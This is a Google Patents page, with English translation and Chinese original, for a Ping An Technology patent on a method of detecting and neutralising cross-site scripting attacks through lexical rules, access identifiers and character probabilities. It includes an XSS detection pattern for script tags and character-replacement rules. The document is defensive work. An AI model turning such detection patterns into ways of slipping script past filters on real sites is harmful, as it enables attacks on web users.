WO2021017318A1 - Cross-site scripting attack protection method and apparatus, device and storage medium - Google Patents

Cross-site scripting attack protection method and apparatus, device and storage medium Download PDF

Info

Publication number
WO2021017318A1
WO2021017318A1 PCT/CN2019/119113 CN2019119113W WO2021017318A1 WO 2021017318 A1 WO2021017318 A1 WO 2021017318A1 CN 2019119113 W CN2019119113 W CN 2019119113W WO 2021017318 A1 WO2021017318 A1 WO 2021017318A1
Authority
WO
WIPO (PCT)
Prior art keywords
cross
site
access
script code
probability
Prior art date
Application number
PCT/CN2019/119113
Other languages
French (fr)
Chinese (zh)
Inventor
孙强
黄国华
Original Assignee
平安科技(深圳)有限公司
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by 平安科技(深圳)有限公司 filed Critical 平安科技(深圳)有限公司
Publication of WO2021017318A1 publication Critical patent/WO2021017318A1/en

Links

Images

Classifications

    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00Network architectures or network communication protocols for network security
    • H04L63/14Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1408Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
    • H04L63/1416Event detection, e.g. attack signature detection
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00Network architectures or network communication protocols for network security
    • H04L63/14Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1441Countermeasures against malicious traffic

Definitions

  • This application relates to the field of network security technology, and in particular to a method, device, equipment, and computer-readable storage medium for preventing cross-site attacks.
  • An XSS attack refers to a malicious attacker inserting malicious script program code into a web page (Web).
  • Web web page
  • the main purpose of this application is to provide a cross-site attack protection method, device, equipment, and computer-readable storage medium, aiming to solve the technical problem of low accuracy of the existing cross-site access defense.
  • the cross-site attack protection method includes the following steps:
  • the external network access request is a collection containing at least one cross-site access script code for implementing cross-site data access
  • a predefined lexical combination rule detect whether there is a malicious program in the HTTP data packet used to respond to the cross-site access in the cross-site access script code carried in the external network access request, where the lexical combination rule is to pass the current A model obtained by analyzing a known malicious attack program;
  • the access identifier exists, it is determined whether there are characters with attack capability in the cross-site access script code;
  • the characters with attack capabilities in the cross-site access script code are filtered out according to the access identifier, and cross-site scripting defense is performed on the cross-site access script code deal with.
  • the step of detecting whether there is a malicious program in the HTTP data packet used to respond to the cross-site access in the cross-site access script code carried in the external network access request according to a predefined lexical combination rule includes:
  • the active tag is a tag with no other active tags between the active tag and the cross-site access script code, and the tag probability is the probability of the active tag directly appearing on the cross-site access script code.
  • the step of screening characters with attack capabilities in the cross-site access script code according to the access identifier, and performing cross-site scripting defense processing on the cross-site access script code includes:
  • the access protection program is started to perform cross-site scripting defense processing on the access request.
  • the calculating the character probability that the character appears in the external network access request includes:
  • the probability of the character appearing in the external network access request is calculated.
  • the calculating the character probability that the character appears in the external network access request according to the number of appearances and the total number includes:
  • P is the probability of occurrence of characters with attack capability
  • m is the number of occurrences
  • M is the total number of cross-site access script codes
  • is the weight coefficient
  • the probability level includes three levels of attack degree from low to high, and performing cross-site scripting defense processing on the cross-site access script code includes:
  • the cross-site access script code is deleted from the external network access request.
  • the performing cross-site scripting defense processing on the cross-site access script code further includes:
  • the security character only realizes the code digit filling function symbol.
  • this application also provides a cross-site attack protection device, the cross-site attack protection device including:
  • the obtaining module is used to obtain the external network access request received by the network side, the external network access request is a collection containing at least one cross-site access script code for implementing cross-site data access;
  • the detection module is configured to detect whether there is a malicious program in the HTTP data packet used to respond to the cross-site access in the cross-site access script code carried in the external network access request according to the predefined lexical combination rule, wherein the lexical combination
  • the rule is a model obtained through analysis of currently known malicious attack programs; and is used to detect whether there is an access identifier in the cross-site access script code when a malicious program is detected, wherein the access identifier is based on a preset User rules are defined;
  • a judging module for judging whether there are characters with attack capabilities in the cross-site access script code if the access identifier exists
  • the defense processing module is configured to, if the character exists in the cross-site access script code, filter out the characters with attack capability in the cross-site access script code according to the access identifier, and check the cross-site access script The code performs cross-site scripting defense processing.
  • the present application also provides a cross-site attack protection device.
  • the cross-site attack protection device includes a memory, a processor, and a cross-site attack that is stored on the memory and can run on the processor.
  • An attack protection program which, when executed by the processor, implements the steps of the cross-site attack protection method described in any one of the above.
  • the present application also provides a computer-readable storage medium that stores a cross-site attack protection program, and when the cross-site attack protection program is executed by a processor, any of the above One of the steps of the cross-site attack protection method.
  • This application performs cross-site attack protection processing through external network access requests, specifically by setting the access identifier in the request and detecting the lexical combination of the code. Marking based on this method not only improves the identification efficiency of the access script code, but also Improved the accuracy of recognition. For characters that are maliciously attacked, the external network access request is disabled by shielding, replacing, etc., so as to achieve the role of cross-site attack defense, improve the security of the system and protect the data of the website Safety.
  • FIG. 1 is a schematic structural diagram of a base station operating environment involved in a solution according to an embodiment of the application;
  • FIG. 2 is a schematic flowchart of the first embodiment of the cross-site attack protection method according to this application;
  • FIG. 3 is a schematic flowchart of a second embodiment of the cross-site attack protection method according to this application.
  • Figure 4 is a schematic diagram of the functional modules of the cross-site attack protection device of this application.
  • This application provides a cross-site attack protection device.
  • FIG. 1 is a schematic structural diagram of the operating environment of the cross-site attack protection equipment involved in the solution of the embodiment of the application.
  • the cross-site attack protection device includes: a processor 101, such as a CPU, a communication bus 102, a user interface 103, a network interface 104, and a memory 105.
  • the communication bus 102 is used to implement connection and communication between these components.
  • the user interface 103 may include a display screen (Display) and an input unit such as a keyboard (Keyboard), and the network interface 104 may optionally include a standard wired interface and a wireless interface (such as a WI-FI interface).
  • the memory 105 may be a high-speed RAM memory, or a non-volatile memory (non-volatile memory), such as a magnetic disk memory.
  • the memory 105 may also be a storage device independent of the aforementioned processor 101.
  • cross-site attack protection device shown in FIG. 1 does not constitute a limitation on the cross-site attack protection device in this application, and may include more or less components than shown in the figure, or Combining certain components, or different component arrangements.
  • the memory 105 as a computer-readable storage medium may include an operating system, a network communication module, a user interface module, and a cross-site attack-based protection program.
  • the operating system is a program that manages and controls cross-site attack protection equipment and software resources, and supports the operation of cross-site attack protection programs and other software and/or programs.
  • the network interface 104 is mainly used to access the network; the user interface 103 is mainly used to detect and confirm the user terminal’s code scanning operation instructions and payment input instructions, etc.
  • the processor 101 may be used to call a cross-site attack protection program stored in the memory 105, and perform operations in the following embodiments of the cross-site attack protection method.
  • the implementation of FIG. 1 may also be a mobile terminal, and the processor of the mobile terminal reads the program code stored in the buffer or the storage unit that can implement the cross-site attack protection method. Cross-site data access.
  • FIG. 2 is a flowchart of a cross-site attack protection method provided by an embodiment of this application.
  • the cross-site attack protection method specifically includes the following steps:
  • Step S210 Obtain an external network access request received by the network side, where the external network access request is a collection containing at least one cross-site access script code for implementing cross-site data access;
  • the external network access request refers to a request sent by a user on the side of a non-visited network, such as the relationship between an internal local area network and an Internet network in a certain company.
  • the external network access request is composed of some script codes, which can be a script code that contains multiple data access methods; it can also be composed of multiple script codes, and each script code corresponds to a type of data. Access.
  • the access script code in the extranet access request can also be understood as a completed access code.
  • the code is downloaded to the corresponding accessed terminal; it can also be a triggered script code. That is to say, the actual access script code is stored in the accessed terminal, and the execution needs to be controlled by the trigger code in the request.
  • Step S220 According to a predefined lexical combination rule, detect whether there is a malicious program in the HTTP data packet used to respond to the cross-site access in the cross-site access script code carried in the external network access request, where the lexical combination rule is A model obtained through analysis of currently known malicious attack programs;
  • the specific principle of detecting whether there is a malicious webpage program is to first perform a cluster analysis of the cross-site access script code in the extranet access request, where the specific analysis code is the access interface of the webpage based on Interface to preliminarily determine the lexical combination form of the access program, and classify it into the same family, and then analyze the lexical combination rules according to all access programs in the same family (that is, access code), and find out that all programs in the same family are called Which dangerous functions, system resources, suspicious tags, key categories and objects, etc., are finally defined according to the word order of these elements to define lexical analysis and detection rules, and finally determine whether the access code is a malicious webpage program.
  • the detection method in this step can effectively prevent a single feature from being bypassed, leading to the problem of misjudgment of malicious programs.
  • Step S230 if there is a malicious program, detect whether there is an access identifier in the cross-site access script code, where the access identifier is defined based on a preset user rule;
  • the user rule definition should be understood as an access rule customized for different web access methods and information storage methods, and an access identifier is set through the access rule.
  • the web server or user terminal receives After the access identifier is reached, it is possible to query and select an access mode matching the access identifier according to the pre-defined corresponding relationship to achieve data access to the webpage.
  • the malicious webpage program detected in step S20 may be the result of preliminary identification as malicious, and then the judgment of marking the access identifier in step S30 realizes the accurate judgment of the preliminary identification result and avoids misidentification of malicious The phenomenon.
  • Step S240 if the access identifier exists, determine whether there are characters with attack capability in the cross-site access script code;
  • the code settings for external network access requests are all public settings, the difference is that some verification parameters or encryption are added to the code, and these security processing methods are basically the same, often It will be cracked, and some malicious code will be added to obtain user information.
  • the external network access request is coded.
  • the coding process here is to convert the programmatic request into one by one.
  • the access script code is the access script code, and the converted access script code refers to the code source program.
  • the keywords are divided into one by one, and the method of dividing the keywords is based on the data that can be accessed. That is to say, the divided keywords can be separated. The little endian of the visit.
  • each of the divided keywords is queried from the pre-set attack information database. If the attack information database is queried, the external network access requests will be filtered according to the keywords. The script code with the queried keywords in, then execute step S50 for script defense processing.
  • the establishment of the attack information database is specifically based on the malicious code keywords obtained from the server’s usual tests. At the same time, it is also formed by obtaining the offensive keywords identified on the network from the network. Of course, it can also be formed based on the user
  • the source code development habit is to choose some infrequently used or relatively uncommon code words to form. When this type of code field is detected, special attention and judgment are required.
  • determining by the definition in the network it is to obtain the general or special definition of the network from the network through the keyword to be detected, and determine whether it can be used for attacking through the definition.
  • Some attack code programs or special-purpose code programs will be published, and access requests can also be made through these codes.
  • Step S250 If the character exists in the cross-site access script code, the characters with attack capability in the cross-site access script code are filtered out according to the access identifier, and the cross-site access script code is cross-referenced. Site script defense processing.
  • the cross-site scripting defense processing is mainly through shielding, deleting, or replacing the characters with attack capability or the entire cross-site access script code in which they are located; and shielding refers to removing characters Hidden from the code by some special means, so as to weaken the attack ability of the code, or even remove its attack ability.
  • the specific processing methods for shielding, deletion and replacement need to be selected according to the performance of the code. If the code has a special function definition, the delete processing method cannot be used. The deletion is usually The code loses the ability to execute, and shielding and replacement can retain the original function of the code.
  • the access identifier when the access identifier is set, it can be specifically implemented in the following ways: Detect user information carried in the external network access request, and determine whether the user information is a preset user rule that requires protection User information;
  • the access identifier is mainly used to define the access method, or it can be for information security
  • the definition of protection, through the setting of the access identifier, the protection of user information can be realized at the same time, and the special characters in the access can also be set.
  • step S240 screening and selecting characters with attack capabilities in the access script code according to the access identifier can be specifically implemented in the following ways:
  • the access rule According to the access identifier, the corresponding relationship between the access identifier and the access rule, the access rule corresponding to the current access identifier is queried, where the access rule contains special characters for realizing cross-site access and cross-site access the way;
  • the characters with attack capabilities in the access script code are filtered according to the special characters, so as to eliminate characters that do not meet the requirements of the access rules from the access script for subsequent cross-site scripting defense processing .
  • the specific implementation process for detecting whether there is a malicious program in the HTTP data packet used to respond to the cross-site access in the cross-site access script code carried in the external network access request according to the predefined lexical combination rule can be for:
  • the active tag is a tag without other active tags between the active tag and the cross-site access script code, and the probability of the tag is the probability of the active tag directly appearing on the cross-site access script code.
  • the steps of screening out characters with attack capabilities in the cross-site access script code according to the access identifier, and performing cross-site scripting defense processing on the cross-site access script code include:
  • the access protection program is activated to perform cross-site scripting defense processing on the access request.
  • the keyword can also be used to calculate the probability of an attack. Used to achieve the probability of an attack to further determine whether it needs to be processed.
  • calculating the probability that the character appears in the external network access request includes:
  • the probability is calculated based on the number of occurrences and the total number.
  • the terminal or server will generally generate an attack log, in which all records of the terminal or server being attacked are stored, and the record can contain keywords or the entire Script code, which calculates and judges whether it is possible to data attack characters on the network side by calculating the keywords that are initially judged to be offensive from the historical records. If the calculated probability is greater than the preset upper limit of probability, the If the character is a high-risk code character, step S240 is executed to defend against XSS by cross-site attack.
  • the calculating the probability according to the number of occurrences and the total number includes:
  • P is the probability of occurrence of characters with attack capability
  • m is the number of occurrences
  • M is the total number of cross-site access script codes
  • is the weight coefficient
  • the cross-site scripting code for cross-site scripting defense processing includes:
  • the probability is greater than the first probability level and less than the second probability level, perform shielding processing on the corresponding character or the entire code in the cross-site access script code;
  • the cross-site access script code is deleted from the external network access request.
  • the XSS attack information database contains 1, 2, and 3.
  • the descriptive characteristics of XSS attack information If the extranet access request contains " ⁇ ", then the " ⁇ " will be replaced with a space according to the replacement definition of the feature; if the extranet access request contains ">", the replacement definition of the feature will be changed ">" is replaced with a space; if the external network access request contains a content string conforming to the regular expression ⁇ s*script ⁇ sW.* ⁇ s*/ ⁇ s*script ⁇ s*>, it will be replaced according to the characteristics Definition, replace it with "com.pingan.xxxx" in a custom way.
  • the malicious attack levels are distinguished according to the above three levels.
  • not all script codes can be directly deleted.
  • script code with a higher level of malicious attack it can be implemented in the following ways:
  • the detection of the script access function can be started to select a safer protection method to achieve it.
  • the implementation process is as follows:
  • the security character only realizes the code digit filling function symbol.
  • replacing the character with attack capability or the entire cross-site access script code in which it is located includes:
  • the keywords in the characters are replaced, or the keywords in the characters are converted into blank Chinese characters through Chinese character conversion rules, so that the characters lose the ability to attack.
  • Cross-site access is achieved through the above-provided method, which realizes the attack detection of malicious scripts in external network access requests, and shields or replaces malicious code characters to disable attack capabilities, ensuring the security of access and information security Sex.
  • Step S310 the base station is receiving the cross-site access request sent by the user through the terminal;
  • the cross-site access request carries identification information pre-negotiated by the base station and the user terminal through a handshake protocol or an encrypted communication protocol, and the setting rule for the identification information may be a check value.
  • Algorithm that is, a check value is automatically generated based on the access script code constructed by the user, and the calculation object of the check value is the code of the script code itself. When the code changes, the check value is natural Changes will occur, and will be reflected in the cross-site access request through identification information.
  • Step S320 the base station recognizes the identification information of the cross-site access request
  • Step S330 Obtain lexical combination rules, and perform code phrase detection on the cross-site access script code in the cross-site access request;
  • the lexical combination rule is mainly to detect the combination between the function in the script code and the applet, and if it is modified, the function or applet in the script code must be changed.
  • the lexical combination rule is equivalent to secondary malicious detection, thus ensuring the accuracy of malicious attack detection.
  • Step S340 extracting attack characters in the cross-site access script code
  • the above attack character can be understood as a code function or a small program, or some code bytes, etc.
  • step S350 is executed, otherwise, step S360 is executed.
  • Step S350 calculating the attack level of the attacking character
  • Step S360 evaluating the function level of the cross-site access script code
  • Step S370 Perform protection processing on the cross-site access script code.
  • the calculation of the attack level can be specifically calculated by calculating the probability of the character, specifically:
  • P is the probability of occurrence of characters with attack ability
  • m is the number of occurrences
  • M is the total number of cross-site access script codes
  • is the weight coefficient
  • the probability is greater than the first probability level and less than the second probability level, perform shielding processing on the corresponding character or the entire code in the cross-site access script code;
  • the cross-site access script code is deleted from the external network access request.
  • the functional evaluation of the cross-site access script code is performed to determine whether the cross-site access script code is a necessary function access code in the external network access request;
  • the security character only realizes the code digit filling function symbol.
  • an embodiment of the present application also provides a cross-site attack protection device.
  • FIG. 4 is a schematic diagram of functional modules of the cross-site attack protection device provided by an embodiment of the application.
  • the device includes:
  • the obtaining module 41 is configured to obtain an external network access request received by the network side, where the external network access request is a collection containing at least one cross-site access script code for implementing cross-site data access;
  • the detection module 42 is configured to detect whether there is a malicious program in the HTTP data packet used to respond to the cross-site access in the cross-site access script code carried in the external network access request according to the predefined lexical combination rule, wherein the lexical method
  • the combination rule is a model obtained through analysis of currently known malicious attack programs; and is used to detect whether there is an access identifier in the cross-site access script code, wherein the access identifier is defined based on a preset user rule;
  • the judging module 43 is configured to judge whether there are characters with attacking ability in the cross-site access script code if the access identifier exists;
  • the defense processing module 44 is configured to, if the character exists in the cross-site access script code, filter out characters with attack capabilities in the cross-site access script code according to the access identifier, and perform access to the cross-site access
  • the script code performs cross-site scripting defense processing.
  • marking based on this method not only improves the identification efficiency of the access script code, but also improves the accuracy of recognition, and for characters with malicious attacks
  • the external network access request loses the ability to attack, so as to achieve the role of cross-site attack defense, improve the security of the system and ensure the data security of the website.
  • the present application also provides a computer-readable storage medium, where the computer-readable storage medium may be volatile or non-volatile, which is not specifically limited by the present application.
  • a cross-site attack protection program is stored on the computer-readable storage medium, and the cross-site attack protection program is executed by a processor to implement the cross-site attack protection method described in any of the above embodiments A step of.
  • the method implemented when the cross-site attack protection program is executed by the processor can refer to the various embodiments of the cross-site attack protection method of the present application, so the details are not repeated here.

Landscapes

  • Engineering & Computer Science (AREA)
  • Computer Security & Cryptography (AREA)
  • Computer Hardware Design (AREA)
  • Computing Systems (AREA)
  • General Engineering & Computer Science (AREA)
  • Computer Networks & Wireless Communication (AREA)
  • Signal Processing (AREA)
  • Computer And Data Communications (AREA)
  • Data Exchanges In Wide-Area Networks (AREA)

Abstract

A cross-site scripting attack protection method and apparatus, a device, and a storage medium, relate to the technical field of network security. The method comprises: performing detection on a code of an external network access request by means of a preset lexical combination rule, providing an access identifier in the external network access request to mark whether malicious attack characters exist in the code, and performing attack defense processing on the external network access request having a code that does not satisfy the lexical combination rule and/or having the access identifier. The marking in such way not only improves the identification efficiency of an access script code, but also improves the accuracy of identification, and if there are malicious attack characters, the attack of the external network access request is disabled by shielding, replacing, etc. so as to achieve the function of cross-site scripting attack defense, thereby improving the security of a system and ensuring the data security of websites.

Description

跨站攻击防护方法、装置、设备及存储介质Cross-site attack protection method, device, equipment and storage medium
本申请要求于2019年08月1日提交中国专利局、申请号为201910706703.9、发明名称为“跨站攻击防护方法、装置、设备及存储介质”的中国专利申请的优先权,其全部内容通过引用结合在申请中。This application claims the priority of a Chinese patent application filed with the Chinese Patent Office on August 1, 2019, the application number is 201910706703.9, and the invention title is "cross-site attack protection methods, devices, equipment and storage media", the entire content of which is incorporated by reference Incorporate in the application.
技术领域Technical field
本申请涉及网络安全技术领域,尤其涉及一种跨站攻击防护方法、装置、设备及计算机可读存储介质。This application relates to the field of network security technology, and in particular to a method, device, equipment, and computer-readable storage medium for preventing cross-site attacks.
背景技术Background technique
随着网络技术的不断发展,网络已经成为了人们现实生活的一部分了,现在各种服务都通过网络来实现,同时随着发展也会成为未来实现智能化的重要平台和载体了。为了提高用户的使用体验,脚本语言在网络应用中被大量的使用。而随着网络设计代码的不断开放使用,导致了脚本代码被篡改而形成跨站脚本(Cross Site Script,即XSS)攻击,这种攻击成为了目前互联网最为严重的安全问题之一。With the continuous development of network technology, the network has become a part of people's real life. Now various services are realized through the network, and with the development, it will become an important platform and carrier for the realization of intelligence in the future. In order to improve the user experience, scripting languages are widely used in network applications. With the continuous open use of network design code, the script code has been tampered with to form a Cross Site Script (XSS) attack, which has become one of the most serious security problems on the Internet.
XSS攻击指的是恶意攻击者往网页(Web)页面里插入恶意脚本程序代码,发明人发现当用户浏览该页面时,嵌入Web里面的恶意脚本程序代码会被执行,从而达到恶意攻击用户,使得用户隐私泄露、客户端电脑感染病毒、控制企业数据、盗窃企业重要的具有商业价值的资料、非法转账、强制发送电子邮件、网站挂马以及控制受害者机器向其他网站发送攻击等问题。An XSS attack refers to a malicious attacker inserting malicious script program code into a web page (Web). The inventor found that when a user browses the page, the malicious script program code embedded in the Web will be executed, thereby maliciously attacking the user, making User privacy leaks, client computers infected with viruses, control of corporate data, theft of important corporate data with commercial value, illegal transfers, forced emails, website hacking, and control of victims’ machines to send attacks to other websites.
发明内容Summary of the invention
本申请的主要目的在于提供一种跨站攻击防护方法、装置、设备及计算机可读存储介质,旨在解决现有的跨站访问防御的准确度较低的技术问题。The main purpose of this application is to provide a cross-site attack protection method, device, equipment, and computer-readable storage medium, aiming to solve the technical problem of low accuracy of the existing cross-site access defense.
为实现上述目的,本申请提供一种跨站攻击防护方法,所述跨站攻击防护方法包括以下步骤:To achieve the above objective, this application provides a cross-site attack protection method. The cross-site attack protection method includes the following steps:
获取网络侧接收到的外网访问请求,所述外网访问请求为包含至少一个用于实现跨站数据访问的跨站访问脚本代码的集合;Acquiring an external network access request received by the network side, where the external network access request is a collection containing at least one cross-site access script code for implementing cross-site data access;
根据预定义的词法组合规则,检测所述外网访问请求携带的跨站访问脚本代码中用于响应跨站访问的HTTP数据包中是否存在恶意程序,其中,所述词法组合规则为通过当前已知的恶意攻击程序分析得到的模型;According to a predefined lexical combination rule, detect whether there is a malicious program in the HTTP data packet used to respond to the cross-site access in the cross-site access script code carried in the external network access request, where the lexical combination rule is to pass the current A model obtained by analyzing a known malicious attack program;
若检测存在恶意程序,则检测所述跨站访问脚本代码中是否存在访问标识,其中,所述访问标识为基于预置的用户规则定义得到;If a malicious program is detected, detecting whether there is an access identifier in the cross-site access script code, where the access identifier is defined based on a preset user rule;
若存在所述访问标识,则判断所述跨站访问脚本代码中是否存在具有攻击能力的字符;If the access identifier exists, it is determined whether there are characters with attack capability in the cross-site access script code;
若所述跨站访问脚本代码中存在所述字符,则根据所述访问标识筛选出所述跨站访问脚本代码中具有攻击能力的字符,并对所述跨站访问脚本代码进行跨站脚本防御处理。If the character exists in the cross-site access script code, the characters with attack capabilities in the cross-site access script code are filtered out according to the access identifier, and cross-site scripting defense is performed on the cross-site access script code deal with.
可选的,所述根据预定义的词法组合规则,检测所述外网访问请求携带的跨站访问脚本代码中用于响应跨站访问的HTTP数据包中是否存在恶意程序的步骤包括:Optionally, the step of detecting whether there is a malicious program in the HTTP data packet used to respond to the cross-site access in the cross-site access script code carried in the external network access request according to a predefined lexical combination rule includes:
执行所述跨站访问脚本代码进行模拟运行,并捕获HTTP数据包在运行时每个访问页面上的活跃标签;Execute the cross-site access script code for simulation operation, and capture the active tags on each access page of the HTTP data packet during operation;
计算所述活跃标签在所述跨站访问脚本代码中的标签概率的倒数,并将所述倒数相加求出算术平均值作为所述活跃标签的内嵌JavaScript合理指数;Calculate the inverse of the tag probability of the active tag in the cross-site access script code, and add the inverse numbers to obtain an arithmetic average as the embedded JavaScript reasonable index of the active tag;
根据所述合理指数对所述跨站访问脚本代码进行归类;Classify the cross-site access script code according to the reasonable index;
其中,所述活跃标签是与所述跨站访问脚本代码之间不存在其它活跃标签的标签,所述标签概率为所述活跃标签内直接出现在所述跨站访问脚本代码上的概率。Wherein, the active tag is a tag with no other active tags between the active tag and the cross-site access script code, and the tag probability is the probability of the active tag directly appearing on the cross-site access script code.
可选的,所述根据所述访问标识筛选出所述跨站访问脚本代码中具有攻击能力的字符,并对所述跨站访问脚本代码进行跨站脚本防御处理的步骤包括:Optionally, the step of screening characters with attack capabilities in the cross-site access script code according to the access identifier, and performing cross-site scripting defense processing on the cross-site access script code includes:
提取所述跨站访问脚本代码中的具有攻击能力的字符;Extracting attack-capable characters in the cross-site access script code;
计算所述字符在所述外网访问请求中出现的字符概率;Calculating the character probability of the character appearing in the external network access request;
比较所述字符概率与预设的信息泄密的概率等级之间的大小关系;Comparing the magnitude relationship between the character probability and the preset probability level of information leakage;
若所述字符概率大于所述概率等级,则启动访问防护程序对所述访问请求进行跨站脚本防御处理。If the character probability is greater than the probability level, the access protection program is started to perform cross-site scripting defense processing on the access request.
可选的,所述计算所述字符在所述外网访问请求中出现的字符概率包括:Optionally, the calculating the character probability that the character appears in the external network access request includes:
调取所述网络侧中出现跨站攻击的所有历史访问记录,并统计所有所述历史访问记录的跨站访问脚本代码的总数量;Retrieve all historical access records of cross-site attacks on the network side, and count the total number of cross-site access script codes of all historical access records;
统计所述字符在所述所有历史访问记录中的出现次数;Counting the number of occurrences of the character in all the historical visit records;
根据所述出现次数和所述总数量,计算出所述字符在所述外网访问请求中出现的字符概率。According to the number of occurrences and the total number, the probability of the character appearing in the external network access request is calculated.
可选的,所述根据所述出现次数和所述总数量计算出所述字符在所述外 网访问请求中出现的字符概率包括:Optionally, the calculating the character probability that the character appears in the external network access request according to the number of appearances and the total number includes:
将所述出现次数除以所述总数量,得到一个百分比值;Divide the number of occurrences by the total number to obtain a percentage value;
将所述百分比值乘以一个权重系数,得到最终的字符概率,其计算公式如下:Multiply the percentage value by a weight coefficient to obtain the final character probability. The calculation formula is as follows:
Figure PCTCN2019119113-appb-000001
Figure PCTCN2019119113-appb-000001
其中,P为具有攻击能力的字符出现的概率,m为所述出现次数,M为所述跨站访问脚本代码的总数量,α为权重系数。Where, P is the probability of occurrence of characters with attack capability, m is the number of occurrences, M is the total number of cross-site access script codes, and α is the weight coefficient.
可选的,所述概率等级包括攻击程度从低到高的三个等级,所述对所述跨站访问脚本代码进行跨站脚本防御处理包括:Optionally, the probability level includes three levels of attack degree from low to high, and performing cross-site scripting defense processing on the cross-site access script code includes:
若所述字符概率大于第一概率等级且小于第二概率等级,则对所述跨站访问脚本代码中对应的字符或者整个代码进行屏蔽处理;If the character probability is greater than the first probability level and less than the second probability level, perform shielding processing on the corresponding character or the entire code in the cross-site access script code;
若所述字符概率大于第二概率等级且小于第三概率等级,则对所述跨站访问脚本代码中的字符或者整个代码进行替换处理;If the character probability is greater than the second probability level and less than the third probability level, replace the characters or the entire code in the cross-site access script code;
若所述字符概率大于第三概率等级,则将所述跨站访问脚本代码从所述外网访问请求中删除。If the character probability is greater than the third probability level, the cross-site access script code is deleted from the external network access request.
可选的,所述对所述跨站访问脚本代码进行跨站脚本防御处理还包括:Optionally, the performing cross-site scripting defense processing on the cross-site access script code further includes:
在所述字符概率大于第三概率等级,则对所述跨站访问脚本代码进行功能性评估,确定所述跨站访问脚本代码在所述外网访问请求中是否为必须的功能访问代码;When the character probability is greater than the third probability level, perform a functional evaluation on the cross-site access script code to determine whether the cross-site access script code is a necessary function access code in the external network access request;
若是,则保留所述跨站访问脚本代码在所述外网访问请求中,并将所述具有攻击能力的字符替换为预设的安全字符,所述安全字符为仅实现代码位数填充作用的符号。If yes, keep the cross-site access script code in the extranet access request, and replace the attack-capable character with a preset security character, the security character only realizes the code digit filling function symbol.
此外,为实现上述目的,本申请还提供一种跨站攻击防护装置,所述跨站攻击防护装置包括:In addition, in order to achieve the above objective, this application also provides a cross-site attack protection device, the cross-site attack protection device including:
获取模块,用于获取网络侧接收到的外网访问请求,所述外网访问请求为包含至少一个用于实现跨站数据访问的跨站访问脚本代码的集合;The obtaining module is used to obtain the external network access request received by the network side, the external network access request is a collection containing at least one cross-site access script code for implementing cross-site data access;
检测模块,用于根据预定义的词法组合规则,检测所述外网访问请求携带的跨站访问脚本代码中用于响应跨站访问的HTTP数据包中是否存在恶意程序,其中,所述词法组合规则为通过当前已知的恶意攻击程序分析得到的模型;以及用于在检测存在恶意程序时,检测所述跨站访问脚本代码中是否存在访问标识,其中,所述访问标识为基于预置的用户规则定义得到;The detection module is configured to detect whether there is a malicious program in the HTTP data packet used to respond to the cross-site access in the cross-site access script code carried in the external network access request according to the predefined lexical combination rule, wherein the lexical combination The rule is a model obtained through analysis of currently known malicious attack programs; and is used to detect whether there is an access identifier in the cross-site access script code when a malicious program is detected, wherein the access identifier is based on a preset User rules are defined;
判断模块,用于若存在所述访问标识,则判断所述跨站访问脚本代码中是否存在具有攻击能力的字符;A judging module, for judging whether there are characters with attack capabilities in the cross-site access script code if the access identifier exists;
防御处理模块,用于若所述跨站访问脚本代码中存在所述字符,则根据所述访问标识筛选出所述跨站访问脚本代码中具有攻击能力的字符,并对所述跨站访问脚本代码进行跨站脚本防御处理。The defense processing module is configured to, if the character exists in the cross-site access script code, filter out the characters with attack capability in the cross-site access script code according to the access identifier, and check the cross-site access script The code performs cross-site scripting defense processing.
此外,为实现上述目的,本申请还一种跨站攻击防护设备,所述跨站攻击防护设备包括:存储器、处理器以及存储在所述存储器上并可在所述处理器上运行的跨站攻击防护程序,所述跨站攻击防护程序被所述处理器执行时实现如上述任一项所述的跨站攻击防护方法的步骤。In addition, in order to achieve the above-mentioned purpose, the present application also provides a cross-site attack protection device. The cross-site attack protection device includes a memory, a processor, and a cross-site attack that is stored on the memory and can run on the processor. An attack protection program, which, when executed by the processor, implements the steps of the cross-site attack protection method described in any one of the above.
此外,为实现上述目的,本申请还一种计算机可读存储介质,所述计算机可读存储介质上存储有跨站攻击防护程序,所述跨站攻击防护程序被处理器执行时实现如上述任一项所述的跨站攻击防护方法的步骤。In addition, in order to achieve the above-mentioned object, the present application also provides a computer-readable storage medium that stores a cross-site attack protection program, and when the cross-site attack protection program is executed by a processor, any of the above One of the steps of the cross-site attack protection method.
本申请通过对外网访问请求进行跨站攻击防护处理,具体是通过在请求中设置访问标识和对代码进行词法组合的检测,基于该种方式进行标志不仅可以提高了访问脚本代码的识别效率,还提高了识别的精度,而对于存在恶意攻击的字符时,通过屏蔽、替换等方式使得外网访问请求失去攻击能力,从而达到跨站攻击防御的作用,提高系统的安全度和保障了网站的数据安全。This application performs cross-site attack protection processing through external network access requests, specifically by setting the access identifier in the request and detecting the lexical combination of the code. Marking based on this method not only improves the identification efficiency of the access script code, but also Improved the accuracy of recognition. For characters that are maliciously attacked, the external network access request is disabled by shielding, replacing, etc., so as to achieve the role of cross-site attack defense, improve the security of the system and protect the data of the website Safety.
附图说明Description of the drawings
图1为本申请实施例方案涉及的基站运行环境的结构示意图;FIG. 1 is a schematic structural diagram of a base station operating environment involved in a solution according to an embodiment of the application;
图2为本申请跨站攻击防护方法第一实施例的流程示意图;2 is a schematic flowchart of the first embodiment of the cross-site attack protection method according to this application;
图3为本申请跨站攻击防护方法第二实施例的流程示意图;3 is a schematic flowchart of a second embodiment of the cross-site attack protection method according to this application;
图4为本申请跨站攻击防护装置的功能模块示意图。Figure 4 is a schematic diagram of the functional modules of the cross-site attack protection device of this application.
本申请目的的实现、功能特点及优点将结合实施例,参照附图做进一步说明。The realization, functional characteristics, and advantages of the purpose of this application will be further described in conjunction with the embodiments and with reference to the accompanying drawings.
具体实施方式Detailed ways
应当理解,此处所描述的具体实施例仅用以解释本申请,并不用于限定本申请。It should be understood that the specific embodiments described herein are only used to explain the application, and not used to limit the application.
